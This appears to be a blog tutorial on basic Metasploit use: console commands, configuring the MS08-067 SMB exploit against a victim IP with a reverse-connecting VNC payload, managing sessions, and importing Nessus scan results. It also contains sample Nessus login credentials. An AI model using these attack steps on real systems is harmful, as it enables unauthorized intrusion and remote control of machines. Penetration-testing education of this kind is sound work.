Metasploit Tutorial From Basic To Advance

Metasploit is the best penetration testing and ethical hacking tool that automate all the process of penetration testing, there are different tutorials are available on Internet but we have discussed metasploit from basic to advance.

Metasploit Basic Command Tutorial

There are many new user of metasploit (beginner of metasploit) ask use to write a basic introductory article about the basic metasploit command and basic usage of metasploit, however we have shared different advance and mid level metasploit tutorial on backtrack 5 you can learn different commands from these tutorials but here is the list of the best and most common commands that are used in metasploit for different purposes. Later on we will share meterpreter commands as well.

Metasploit is the database of all exploits and a software that contain information about different exploits so here is the basic usage of metasploit, I am using backtrack 5 machine for this tutorial however if you are using other Linux distribution or windows OS than it is fine but the requirement is Metasploit.

Msfconsole

Msfconsole is a console or a command windows of metasploit that will give you the full support of internal and external metasploit commands, there was a web interface of metasploit but now we don't have that option.

So on your terminal type msfconsole to start metasploit console.

root@bt:~# msfconsole

Metasploit is also available on GUI (graphical user interface), if you want to run metasploit GUI than on the terminal type.

root@bt:~# msfgui

Help command of metasploit will give you the basic idea about the usage of metasploit, if you are looking for msfconsole help than from the root windows type

root@bt:~# msfconsole -h

For msfconsole usage you need to be on msfconsole window to get the help.

msf > help

Connect command is nothing but the alternate of telnet and ncat in metasploit, use connect command to connect with the remote and local host on metasploit you can define the IP of the host machine.

msf > connect -s www.metasploit.com 443

[*] Connected to www.metasploit.com:443

GET / HTTP/1.0

-s → SSL

Ping command of msfconsole is to check the alive host and so on.

msf > ping 192.168.1.45

Show exploits is a command to check all the available exploits on metasploit

msf > show exploits

Show payloads just like show exploits, show payloads will show you all the available payloads on metasploit.

msf > show payloads

Info command will give you more information about any exploits and payloads.

Msf>info <exploit>

msf>info <payload>

Use command will give metasploit an instruction to use a exploit or payload.

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > show options To show available options

msf exploit(ms08_067_netapi) > set rhost 119.67.45.2 → To set remote IP (victim IP)

msf exploit(ms08_067_netapi) > set lhost 192.168.1.45 → To set local IP (attacker IP)

msf exploit(ms08_067_netapi) > set rport 445 → To set port number of remote host

msf exploit(ms08_067_netapi) > set lport 443 → To set port number of local host

msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns → Tp set payload

msf exploit(ms08_067_netapi) > unset rhost → To remove rhost

msf exploit(ms08_067_netapi) > unset lhost → To remove local host

msf exploit(ms08_067_netapi) > exploit → To execute exploit

msf exploit(ms08_067_netapi) > back → To go back on the main window

msf exploit(ms08_067_netapi) > sessions -l → To check any active session

msf exploit(ms08_067_netapi) > sessions -i ID → To go on a active session ID must be numeric number

Integrate Nessus With Metasploit

There are so many tools but the importance of Nessus as a vulnerability scanner is not hidden, and the metasploit master of all the tools that contain the available exploit makes it so important for penetration testing and for hacking.

This time we have decided to write on to use metasploit on the basis of nessus result, you can use your Linux box (recommended) as well as windows box, backtrack5 is available so if you are doing practice on backtrack machine than it is good, while I am using ubuntu for this tutorial.

So start metasploit,

$ msfconsole

In this process we make Nessus Bridge for Metasploit, so on the metasploit type.

msf > load nessus

After successfully login the plugin you need to run and import the result of nessus into metasploit, so first of all we have to connect our nessus server with metasploit here is the command,

msf > nessus_connect username:password@hostname:port

msf > nessus_connect ehacking:irfan@127.0.0.1:8834

After successful authentication you can check the status of your nessus scan, you can check the policy, you can pause and resume the scan, you can view add and delete user and in general you can do anything that you can do with nessus window.

If you want to check the server status than type

msf > nessus_server_status

Now come to the main objective of the article, below command is for check all the reports

msf > nessus_report_list

If you want to know about the host from the report,

msf > nessus_report_hosts <report id> msf > nessus_report_hosts a6656thy45ehacking

If there is a need to find out the information from a particular host use the command below.

msf > nessus_report_host_ports <hostname> <report id>

msf > nessus_report_host_ports 192.168.1.1 a6656thy45ehacking

#metasploit #hac #exploit #nessus

Recent Posts 
Serach By Tags
No tags yet.